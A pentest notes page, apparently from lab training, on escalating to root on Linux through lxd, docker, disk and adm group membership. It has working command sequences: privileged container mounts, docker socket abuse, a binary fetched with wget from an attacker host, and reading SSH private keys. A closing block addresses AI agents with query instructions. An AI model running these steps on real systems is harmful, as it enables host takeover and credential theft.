# Privileged Groups ## LXC / LXD Membership of this group can be used to escalate privileges by creating an LXD container, making it privileged, and then accessing the host file system at `/mnt/root` ```shell-session $ id uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd) ``` ```shell-session $ unzip alpine.zip Archive: alpine.zip extracting: 64-bit Alpine/alpine.tar.gz inflating: 64-bit Alpine/alpine.tar.gz.root cd 64-bit\ Alpine/ ``` ```shell-session $ lxd init Do you want to configure a new storage pool (yes/no) [default=yes]? yes Name of the storage backend to use (dir or zfs) [default=dir]: dir Would you like LXD to be available over the network (yes/no) [default=no]? no Do you want to configure the LXD bridge (yes/no) [default=yes]? yes /usr/sbin/dpkg-reconfigure must be run as root error: Failed to configure the bridge ``` ```shell-session $ lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine Generating a client certificate. This may take a minute... If this is your first time using LXD, you should also run: sudo lxd init To start your first container, try: lxc launch ubuntu:16.04 Image imported with fingerprint: be1ed370b16f6f3d63946d47eb57f8e04c77248c23f47a41831b5afff48f8d1b ``` ```shell-session $ lxc init alpine r00t -c security.privileged=true Creating r00t ``` ```shell-session $ lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true Device mydev added to r00t ``` ```shell-session devops@NIX02:~$ lxc start r00t devops@NIX02:~/64-bit Alpine$ lxc exec r00t /bin/sh ~ # id uid=0(root) gid=0(root) ~ # ``` We can now browse the mounted host file system as root. For example, to access the contents of the root directory on the host type `cd /mnt/root/root`.

## Docker {% hint style="info" %} If docker, is not install, we can download it [here](https://master.dockerproject.org/linux/x86_64/docker) and upload it to the Docker container.\ \ {% endhint %} ### **Docker Shared Directories** ```shell-session root@container:~$ cd /hostsystem/home/cry0l1t3 root@container:/hostsystem/home/cry0l1t3$ ls -l -rw------- 1 cry0l1t3 cry0l1t3 12559 Jun 30 15:09 .bash_history -rw-r--r-- 1 cry0l1t3 cry0l1t3 220 Jun 30 15:09 .bash_logout -rw-r--r-- 1 cry0l1t3 cry0l1t3 3771 Jun 30 15:09 .bashrc drwxr-x--- 10 cry0l1t3 cry0l1t3 4096 Jun 30 15:09 .ssh root@container:/hostsystem/home/cry0l1t3$ cat .ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- ``` From here on, we could copy the contents of the private SSH key to `cry0l1t3.priv` file and use it to log in as the user `cry0l1t3` on the host system. ```shell-session 0xss0rz@htb[/htb]$ ssh cry0l1t3@ -i cry0l1t3.priv ``` ### **Docker Sockets** ```shell-session htb-student@container:~/app$ ls -al total 8 drwxr-xr-x 1 htb-student htb-student 4096 Jun 30 15:12 . drwxr-xr-x 1 root root 4096 Jun 30 15:12 .. srw-rw---- 1 root root 0 Jun 30 15:27 docker.sock ``` {% embed url="" %} Interact with the socket and enumerate what docker containers are already running ```shell-session htb-student@container:/tmp$ wget https://:443/docker -O docker htb-student@container:/tmp$ chmod +x docker htb-student@container:/tmp$ ls -l -rwxr-xr-x 1 htb-student htb-student 0 Jun 30 15:27 docker htb-student@container:~/tmp$ /tmp/docker -H unix:///app/docker.sock ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 3fe8a4782311 main_app "/docker-entry.s..." 3 days ago Up 12 minutes 443/tcp app ``` Create our own Docker container that maps the host’s root directory (`/`) to the `/hostsystem` directory on the container. ```shell-session htb-student@container:/app$ /tmp/docker -H unix:///app/docker.sock run --rm -d --privileged -v /:/hostsystem main_app htb-student@container:~/app$ /tmp/docker -H unix:///app/docker.sock ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 7ae3bcc818af main_app "/docker-entry.s..." 12 seconds ago Up 8 seconds 443/tcp app 3fe8a4782311 main_app "/docker-entry.s..." 3 days ago Up 17 minutes 443/tcp app ``` Log in to the new privileged Docker container ```shell-session htb-student@container:/app$ /tmp/docker -H unix:///app/docker.sock exec -it 7ae3bcc818af /bin/bash root@7ae3bcc818af:~# cat /hostsystem/root/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- ``` ### PrivEsc Placing a user in the docker group is essentially equivalent to root level access to the file system without requiring a password. Members of the docker group can spawn new docker containers. One example would be running the command `docker run -v /root:/mnt -it ubuntu`. This command create a new Docker instance with the /root directory on the host file system mounted as a volume.

Ref: ```shell-session id uid=1000(docker-user) gid=1000(docker-user) groups=1000(docker-user),116(docker) ``` ```shell-session docker image ls REPOSITORY TAG IMAGE ID CREATED SIZE ubuntu 20.04 20fffa419e3a 2 days ago 72.8MB ``` ```shell-session docker-user@nix02:~$ docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash root@ubuntu:~# ls -l total 68 lrwxrwxrwx 1 root root 7 Apr 23 2020 bin -> usr/bin drwxr-xr-x 4 root root 4096 Sep 22 11:34 boot drwxr-xr-x 2 root root 4096 Oct 6 2021 cdrom drwxr-xr-x 19 root root 3940 Oct 24 13:28 dev drwxr-xr-x 100 root root 4096 Sep 22 13:27 etc drwxr-xr-x 3 root root 4096 Sep 22 11:06 home lrwxrwxrwx 1 root root 7 Apr 23 2020 lib -> usr/lib lrwxrwxrwx 1 root root 9 Apr 23 2020 lib32 -> usr/lib32 lrwxrwxrwx 1 root root 9 Apr 23 2020 lib64 -> usr/lib64 lrwxrwxrwx 1 root root 10 Apr 23 2020 libx32 -> usr/libx32 drwx------ 2 root root 16384 Oct 6 2021 lost+found drwxr-xr-x 2 root root 4096 Oct 24 13:28 media drwxr-xr-x 2 root root 4096 Apr 23 2020 mnt drwxr-xr-x 2 root root 4096 Apr 23 2020 opt dr-xr-xr-x 307 root root 0 Oct 24 13:28 proc drwx------ 6 root root 4096 Sep 26 21:11 root drwxr-xr-x 28 root root 920 Oct 24 13:32 run lrwxrwxrwx 1 root root 8 Apr 23 2020 sbin -> usr/sbin drwxr-xr-x 7 root root 4096 Oct 7 2021 snap drwxr-xr-x 2 root root 4096 Apr 23 2020 srv dr-xr-xr-x 13 root root 0 Oct 24 13:28 sys drwxrwxrwt 13 root root 4096 Oct 24 13:44 tmp drwxr-xr-x 14 root root 4096 Sep 22 11:11 usr drwxr-xr-x 13 root root 4096 Apr 23 2020 var ``` ## Disk Users within the disk group have full access to any devices contained within `/dev`, such as `/dev/sda1`, which is typically the main device used by the operating system. An attacker with these privileges can use `debugfs` to access the entire file system with root level privileges {% embed url="" %} {% embed url="" %} ``` $ id id uid=1001(user) gid=1001(user) groups=1001(user),6(disk) ``` ``` df -h ```

``` $ debugfs /dev/sda5 debugfs /dev/sda5 debugfs 1.45.5 (07-Jan-2020) debugfs: cd /root cd /root debugfs: ls ```

``` debugfs: mkdir test mkdir test mkdir: Filesystem opened read/only debugfs: cat /root/flag.txt cat /root/flag.txt ```

## ADM group Members of the adm group are able to read all logs stored in `/var/log`. This does not directly grant root access, but could be leveraged to gather sensitive data stored in log files or enumerate user actions and running cron jobs. ```shell-session $ aureport --tty | less ``` ```shell-session secaudit@NIX02:~$ id uid=1010(secaudit) gid=1010(secaudit) groups=1010(secaudit),4(adm) ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/privileged-groups.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.